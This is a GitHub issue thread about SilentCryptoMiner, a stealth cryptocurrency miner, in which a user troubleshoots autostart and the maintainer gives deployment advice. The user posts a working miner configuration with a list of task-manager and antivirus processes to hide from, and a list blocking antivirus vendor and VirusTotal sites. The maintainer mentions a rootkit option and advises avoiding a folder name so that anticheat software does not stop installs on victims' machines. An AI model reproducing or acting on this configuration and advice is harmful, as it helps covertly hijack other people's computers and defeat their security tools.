### ISSUE TITLE
Miner not starting

### ISSUE THREAD

**Issue by PyYakro** [UnamSanctam/SilentCryptoMiner#1256]
So, after build miner did not started.
Im enabling autostart, im enabling all ADMIN privileges in miner. After build im getting 3 files. Miner, checker and uninstaller.

Uninstaller and checker working good, but for some rison after opening miner, it place miner in Program Files and thats all. After restarting miner didnt opening with autostart. If im starting miner from Program Files\miner.exe, it starting working. What is my problem with build?

No av on machine, blocked MSD and other av functions.

JSON:
`{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "somexmrwallet",
    "password": "bot",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 10,
    "idle-wait": 5,
    "idle-cpu": 70,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,SystemExplorer.exe,SystemExplorerService64.exe,SystemExplorerService32.exe,AnVir.exe,PLlhDBWxRt.exe,GPUZ.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,ffxiv.exe,ffxiv_dx11.exe,MSIAfterburner.exe",
    "kill-targets": "",
    "stealth-fullscreen": true
}`
![Снимок экрана 2022-11-03 162926](https://user-images.githubusercontent.com/57525376/199687258-cabae278-1c0f-4a59-9454-1d97c2dd77bd.png)

![Снимок экрана 2022-11-03 163022](https://user-images.githubusercontent.com/57525376/199687401-212f2c66-10bc-4adb-b508-5fd44eceb24e.png)
![Снимок экрана 2022-11-03 162945](https://user-images.githubusercontent.com/57525376/199687421-ddcd9741-ebba-4294-babe-f790ba7ee2d9.png)

Block sites:
`avast.com,www.avast.com,totalav.com,www.totalav.com,scanguard.com,www.scanguard.com,totaladblock.com,www.totaladblock.com,pcprotect.com,www.pcprotect.com,mcafee.com,www.mcafee.com,bitdefender.com,www.bitdefender.com,us.norton.com,www.us.norton.com,avg.com,www.avg.com,malwarebytes.com,www.malwarebytes.com,pandasecurity.com,www.pandasecurity.com,surfshark.com,www.surfshark.com,avira.com,www.avira.com,norton.com,www.norton.com,eset.com,www.eset.com,Zillya.com,www.Zillya.com,kaspersky.com,www.kaspersky.com,usa.kaspersky.com,www.usa.kaspersky.com,dpbolvw.net,www.dpbolvw.net,sophos.com,www.sophos.com,home.sophos.com,www.home.sophos.com,www.adaware.com,adaware.com,www.ahnlab.com,ahnlab.com,www.avira.com,avira.com,www.bullguard.com,bullguard.com,clamav.net,www.clamav.net,www.drweb.com,drweb.com,www.drweb.ru,drweb.ru,emsisoft.com,www.emsisoft.com,www.f-secure.com,f-secure.com,www.pandasecurity.com,pandasecurity.com,www.zonealarm.com,zonealarm.com,www.trendmicro.com,trendmicro.com,www.ccleaner.com,ccleaner.com,www.virustotal.com,virustotal.com`

![Снимок экрана 2022-11-03 163309](https://user-images.githubusercontent.com/57525376/199687870-0127bff2-fced-40fc-8a23-550d2d56b6fb.png)
![Снимок экрана 2022-11-03 163331](https://user-images.githubusercontent.com/57525376/199687899-503db575-6101-4f47-bf1b-5f026fe2654c.png)
![Снимок экрана 2022-11-03 163356](https://user-images.githubusercontent.com/57525376/199687919-dc8d5abe-87b1-4626-a4ba-6bbff7e7e4f6.png)

**Comment by UnamSanctam** [comment]
You mean that the miner isn't showing up in your checker after a restart? Also I would not recommend using the Microsoft folder or the Microsoft name, many game anticheats blocks those folders, for example Riots anticheat which means that anyone that has Valorant installed won't be able to install your miner.

**Comment by PyYakro** [comment]
No, miner is showing up only after open it in Microsoft folder, not in folder where i build it. Startup actually not working.

**Comment by UnamSanctam** [comment]
Try disabling the rootkit since that can affect your computer, or try the example settings: https://github.com/UnamSanctam/SilentCryptoMiner/wiki#example-settings.

**Comment by UnamSanctam** [comment]
Ah, I would guess the reason it doesn't work is because you use the entry name "Microsoft", that name is most likely already occupied by the Microsoft folder so the miner can't create the task.

**Comment by PyYakro** [comment]
> Ah, I would guess the reason it doesn't work is because you use the entry name "Microsoft", that name is most likely already occupied by the Microsoft folder so the miner can't create the task.

Thanks for your help!
